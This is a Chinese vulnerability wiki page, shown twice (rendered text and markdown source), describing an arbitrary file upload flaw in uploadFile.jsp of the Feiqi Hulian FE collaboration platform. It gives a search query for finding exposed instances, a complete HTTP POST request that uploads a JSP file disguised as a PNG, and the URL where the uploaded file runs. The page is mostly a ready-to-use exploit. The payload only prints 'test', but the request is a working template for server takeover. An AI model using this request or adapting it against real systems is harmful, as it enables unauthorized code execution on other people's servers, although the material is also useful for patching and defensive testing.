fofamini-wiki

登录白背景

源码

飞企互联FE业务协作平台uploadFile.jsp任意文件上传漏洞

一、漏洞描述

FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台uploadFile.jsp任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

二、影响版本

飞企互联FE业务协作平台

三、资产测绘

hunterapp.name=="飞企互联 FE 6.0+"||app.name=="飞企互联 FE"
登录页面

四、漏洞复现

访问如下页面返回200，出现以下页面表示可能存在漏洞

http://xx.xx.xx.xx/common/uploadFile.jsp

上传文件

POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=23092446220001.jpg&title1=%CE%C4%BC%FE%C9%CF%B4%AB&title2=%D1%A1%D4%F1%CE%C4%BC%FE%A3%BA&allowsize=null&extName=.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------289579299639009738743696321529
Content-Length: 7542
Connection: close
Cookie: JSESSIONID=F1CA47A72BBC533FE551E29372212913
Upgrade-Insecure-Requests: 1

-----------------------------289579299639009738743696321529
Content-Disposition: form-data; name="iconFile"; filename="1.jsp"
Content-Type: image/png

<% out.println("test");%>
-----------------------------289579299639009738743696321529--

根据回显回去文件上传位置

http://xx.xx.xx.xx/images/upload/23092446270001.jsp

原文: https://www.yuque.com/xiaokp7/ocvun2/bdtlkymf3ghhmzq4

# 飞企互联FE业务协作平台uploadFile.jsp任意文件上传漏洞

# 一、漏洞描述
FE 办公协作平台是实现应用开发、运行、管理、维护的信息管理平台。飞企互联FE业务协作平台uploadFile.jsp任意文件上传漏洞，攻击者可通过该漏洞获取服务器权限。

# 二、影响版本

- 飞企互联FE业务协作平台

# 三、资产测绘

- hunter`app.name=="飞企互联 FE 6.0+"`||`app.name=="飞企互联 FE"`
- 登录页面

![image.png](./img/al3JKHMuQ-IH_d08/1692266465639-4e39b2e2-11b3-413b-a119-1c569b2deb21-259229.png)

# 四、漏洞复现
访问如下页面返回200，出现以下页面表示可能存在漏洞
```
http://xx.xx.xx.xx/common/uploadFile.jsp
```
![image.png](./img/al3JKHMuQ-IH_d08/1695565268731-da898cce-9ea0-48f8-a600-82454b6cf95f-739945.png)
上传文件
```
POST /common/uploadFile.jsp?action=save&savePath=/images/upload/&fileName=23092446220001.jpg&title1=%CE%C4%BC%FE%C9%CF%B4%AB&title2=%D1%A1%D4%F1%CE%C4%BC%FE%A3%BA&allowsize=null&extName=.jsp HTTP/1.1
Host: xx.xx.xx.xx
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/117.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Content-Type: multipart/form-data; boundary=---------------------------289579299639009738743696321529
Content-Length: 7542
Connection: close
Cookie: JSESSIONID=F1CA47A72BBC533FE551E29372212913
Upgrade-Insecure-Requests: 1

-----------------------------289579299639009738743696321529
Content-Disposition: form-data; name="iconFile"; filename="1.jsp"
Content-Type: image/png

<% out.println("test");%>
-----------------------------289579299639009738743696321529--

```
![image.png](./img/al3JKHMuQ-IH_d08/1695565778442-16079c7c-097a-4800-b5bd-005df19c40a9-607210.png)
根据回显回去文件上传位置
```
http://xx.xx.xx.xx/images/upload/23092446270001.jsp
```
![image.png](./img/al3JKHMuQ-IH_d08/1695565820197-3fe4f5db-9b8c-47d9-9327-83d5ec89167d-347192.png)

> 原文: <https://www.yuque.com/xiaokp7/ocvun2/bdtlkymf3ghhmzq4>